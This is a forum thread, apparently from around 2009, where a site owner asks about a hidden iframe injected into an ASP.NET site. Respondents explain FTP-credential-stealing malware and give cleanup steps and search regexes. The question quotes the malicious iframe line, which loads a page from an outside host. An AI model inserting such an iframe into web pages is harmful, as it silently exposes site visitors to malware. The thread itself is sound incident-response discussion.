A website of mine has recently been infected with some sort of attack that involved injecting a hidden iframe, and it's source was from a site q5x.ru (do not link).

A Google search didn't help me in figuring out how this attack my have took place, so I was wondering if anyone of you may have encountered this same problem?

The iframe code was something of the sort:

<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

As per request, I am running an ASP.Net website with a database, and as regards forms, it's obviously the ASP.Net form that's used for postbacks.

Andreas Grech
  • 195
  • 1
  • 1
  • 7
  • What sort of site are you running? ASP.NET, Java, PHP..... Is the content static or dynamic, do you have forms? You really need to give a little more info on your site. –  Jul 30 '09 at 09:15
  • **If this is a programming question (site design, etc) it should be on stack overflow.** – Josh K Mar 23 '10 at 21:43
  • actually it looks more like a sysadmin question, so i suggest it be moved to ServerFault @JoshK. it is somewhat gray-area, and an old question that seems abandoned. – quack quixote Mar 24 '10 at 21:34

4 Answers4


We have recently encountered the same problem on one of our client's website.

This problem is most likely being caused by a virus infection that primarily targets FTP clients and searches for hostname / username / password combinations. Once found, a connection to the FTP server is being opened and it searches for index.* files and adds the iFrame to it.

In our particular case, our client was one of the few that had direct access to the FTP-server. We immediately changed the passwords, restored backups of the files and removed FTP access for our client.

Steps you should take:

  • Change your passwords immediately
  • If you have access to the server FTP logs, find out what files have been infected
  • For infected files I strongly advise to manually restore these files and not use search / replace by default. In most cases, the IFrames are added at the end of the file, but I have also seen files being partially deleted.

Also note, if the Google crawler visits your site while it is infected, it will add you to the malware list which will seriously affect your site's reputation. If this happens, take the following steps:

  1. Make sure the site contains no more infected files
  2. Make sure your site is verified with the Google Webmaster Tools
  3. Use Google Webmaster Tools to request a new site review
Aron Rotteveel
  • 8,239
  • 17
  • 51
  • 64

Here are a few tips that might help you:

  1. The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
  2. Change the file permissions in your server to the maximum secure mode.
  3. Download all your files from the server and check for infections. Clean the infected files.
  4. Using a good antivirus software, scan and clean every PC you use for logging into your hosting server.
  5. Never use public computers to access your server.

How do I clean infected files?

Use these regular expressions to search for all pages containig the malicious code and replace it with space:

<iframe src=\”http://[^"]*” width=105 height=175 style=\”visibility:hidden;

echo \”<iframe src=\\\”http://[^"]*\” width=105 height=175 style=\\\”
visibility:hidden; position:absolute\\\”></iframe>\”;

You may have to write a script to automate this for all the files in the server.

Source : http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/


  • 329
  • 2
  • 4
  • 12

this has happened to me before. You need to manually search for the offending injection script and delete it. I suggest you change your passwords and also change the names of your database and database tables just to make sure

  • 225
  • 5
  • 10

Though @Aron writes that probably some client-side virus has captured your passwords (which may very well be true for this specific attack), often these kind of attacks exploit unpatched vulnerabilities in the server software. Like in the web server itself, in a CMS, or in tools such as phpMyAdmin.

So: are you sure you're running the latest versions of all software on your server?

(Or do the FTP logs indeed show some activity?)

  • 403
  • 4
  • 8